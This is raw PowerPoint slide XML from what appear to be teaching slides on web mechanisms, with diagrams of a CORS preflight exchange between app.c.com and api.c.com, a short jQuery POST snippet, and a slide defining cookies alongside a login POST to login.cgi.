            <a:off x="3173506" y="2420471"/>
            <a:ext cx="114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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>POST /x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66CDB1A-7570-FE4B-802D-AF60D5CAEDC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2365097" y="3957917"/>
            <a:ext cx="3947084" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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E94AAD3-6DA5-E742-8CE6-BC2A0017F15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3170217" y="3564823"/>
            <a:ext cx="1563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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OPTIONS /x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FDB7520-56D3-1F4B-8788-B0616F8B9F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2365097" y="4166346"/>
            <a:ext cx="3947084" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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Header:…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CAE26D8-BC75-FE42-B7DD-D28024CF6B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2287915" y="4406922"/>
            <a:ext cx="4865920" cy="469359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2700" b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Header: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2700" b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier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5ACEA11-3ED6-514F-B18A-CE2F0DC779B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426913" y="5419164"/>
            <a:ext cx="3947084" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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F0B15DB6-C2B6-5D48-A048-3F6389BD0CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3188965" y="4997865"/>
            <a:ext cx="114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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>POST /x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55019E9-5F69-4D4F-B21D-CE92A88A004E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2312894" y="5675678"/>
            <a:ext cx="3947084" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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B23851E2-1A31-5D4F-87AB-107DA65B5EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173506" y="5747526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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DATA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A0B4914-4CE8-DA43-BC0D-91652642C4EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7566212" y="3944471"/>
            <a:ext cx="1773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origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>api.c.com</a:t>
            </a:r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8C4A795-4947-5645-894E-0723A651412E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8024112" y="930884"/>
            <a:ext cx="18549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origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>app.c.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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BB60A7A-7A94-694B-A8D6-381A91F8ADB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1330384" y="1807080"/>
            <a:ext cx="4149360" cy="3853080"/>
            <a:chOff x="1330384" y="1807080"/>
            <a:chExt cx="4149360" cy="3853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9D3D8F97-33D8-EA48-B155-7FE7B9F6E652}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1330384" y="1807080"/>
                <a:ext cx="4149360" cy="385308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9D3D8F97-33D8-EA48-B155-7FE7B9F6E652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294744" y="1771440"/>
                  <a:ext cx="4221000" cy="392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975DBA39-B2C0-CD4F-B100-AAD36D0FC7E8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5156104" y="1970880"/>
                <a:ext cx="307080" cy="28728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975DBA39-B2C0-CD4F-B100-AAD36D0FC7E8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120104" y="1935240"/>
                  <a:ext cx="378720" cy="35892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30" name="download.png" descr="download.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE6C95A-7F85-0F4C-AB7F-4647E69432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6168" y="4482527"/>
            <a:ext cx="371475" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000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1801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3" grpId="0"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="24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438D7-4F92-2F44-B90E-3BB90AD0E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CORS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="download.jpg" descr="download.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5207CC5F-05CC-5A46-B8FE-F615DE24FC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228" y="3911404"/>
            <a:ext cx="1307310" cy="13106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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Origin: app.c.com…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3199B0EA-7810-5F49-ACE3-F298451C6704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859737" y="1321632"/>
            <a:ext cx="3019370" cy="1823442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumOff val="-13575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171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$.post({</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>: “</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>api.c.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/x“, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>  success: function(r){</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>    $("#div1").html(r); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2900" b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1600" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Origin:  api.c.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD0B8858-5EA5-404F-9A59-DFDF0FD0A2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7566212" y="4356635"/>
            <a:ext cx="2016733" cy="1371585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:satOff val="-15798"/>
              <a:lumOff val="-17517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171450">
              <a:defRPr sz="2900" b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sz="1600" dirty="0">
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier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78B5BB5-0E5B-8C4B-88D9-099601852BDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2312894" y="2014194"/>
            <a:ext cx="3783106" cy="1697194"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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6A76DCD-B33F-AB4B-9B07-95A5C894CACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173506" y="2420471"/>
            <a:ext cx="114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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>POST /x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66CDB1A-7570-FE4B-802D-AF60D5CAEDC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2365097" y="3957917"/>
            <a:ext cx="3947084" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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E94AAD3-6DA5-E742-8CE6-BC2A0017F15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3170217" y="3564823"/>
            <a:ext cx="1563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" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OPTIONS /x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FDB7520-56D3-1F4B-8788-B0616F8B9F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2365097" y="4166346"/>
            <a:ext cx="3947084" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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Header:…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CAE26D8-BC75-FE42-B7DD-D28024CF6B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2287915" y="4406922"/>
            <a:ext cx="4865920" cy="469359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2700" b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Header: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="171450">
              <a:defRPr sz="2700" b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>www.c.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier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A0B4914-4CE8-DA43-BC0D-91652642C4EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7566212" y="3944471"/>
            <a:ext cx="1773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origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>api.c.com</a:t>
            </a:r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8C4A795-4947-5645-894E-0723A651412E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8024112" y="930884"/>
            <a:ext cx="18549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origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>app.c.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="download.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE6C95A-7F85-0F4C-AB7F-4647E69432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1826168" y="4482527"/>
            <a:ext cx="371475" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000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297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3" grpId="0"/>
      <p:bldP spid="2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Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC6032C-5A07-444C-A737-E9C3DA5AA88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 typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>   A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> is a file created by a website to store information in the browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC76B79E-9361-2A41-A655-3C57E18125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0201" y="2759075"/>
            <a:ext cx="1128713" cy="838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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20485" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD6A1717-0C9E-1349-9C26-136E77975B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00213" y="2859088"/>
            <a:ext cx="914400" cy="6096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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20486" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9DD3048-9B9D-E94B-96DE-50638190F2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9200" y="3597275"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20487" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC1E150-6FAF-F149-BF57-1F6362087C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9200" y="3825875"/>
            <a:ext cx="1143000" cy="152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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20488" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416D1F5F-89EF-484F-8180-6397434D7315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2343150" y="3592513"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 252"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 243"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 252"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 243"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 252"/>
              <a:gd name="T5" fmla="*/ 0 h 243"/>
              <a:gd name="T6" fmla="*/ 0 w 252"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 243"/>
              <a:gd name="T8" fmla="*/ 0 w 252"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 24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52"/>
              <a:gd name="T16" fmla="*/ 0 h 243"/>
              <a:gd name="T17" fmla="*/ 252 w 252"/>
              <a:gd name="T18" fmla="*/ 243 h 24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52" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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sp>
        <p:nvSpPr>
          <p:cNvPr id="20489" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E330073A-5B0A-AD46-98B7-C938C8EF32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24600" y="2682875"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20490" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{538C2991-8452-E743-AFD3-21022303E4E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="3048000"/>
            <a:ext cx="3581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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20491" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFB96752-18A0-464F-B3AB-C12A5507E2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95374" y="2667001"/>
            <a:ext cx="1840567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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>login.cgi</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>username and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20492" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F95BDB-8A6C-6144-B31E-38D37AA8FC56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
